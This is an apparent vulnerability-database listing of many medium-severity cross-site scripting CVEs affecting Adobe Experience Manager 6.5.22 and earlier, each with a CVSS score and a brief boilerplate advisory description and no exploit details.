Adobe
XSS
Experience Manager
-
CVE-2025-47075
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47074
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47073
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47072
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47071
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47070
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47069
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47068
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47067
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47066
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47065
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47063
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47062
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47060
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47057
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47056
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47055
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47052
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47051
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47050
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47049
MEDIUM
CVSS 6.1
Adobe Experience Manager versions 6.5.22 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a specially crafted web page.
Adobe
XSS
Experience Manager
-
CVE-2025-47048
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47047
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47045
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47044
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47042
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47041
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47040
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47039
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47038
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47037
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47036
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47035
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47034
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47033
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47032
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47031
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47030
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47029
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47027
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47026
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47025
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47022
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47021
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47020
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47019
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47017
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47016
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47015
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47014
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47013
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47012
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47011
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47010
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47008
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47007
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47006
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47005
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47004
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47003
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47002
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47000
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46999
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46997
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46995
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46992
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46991
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46990
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46989
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46988
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46987
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46986
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46985
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46984
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46983
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46982
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46981
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46979
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46978
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46977
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46976
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46975
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46974
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46973
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46972
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46971
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46970
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46968
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46967
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46966
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46965
MEDIUM
CVSS 5.4
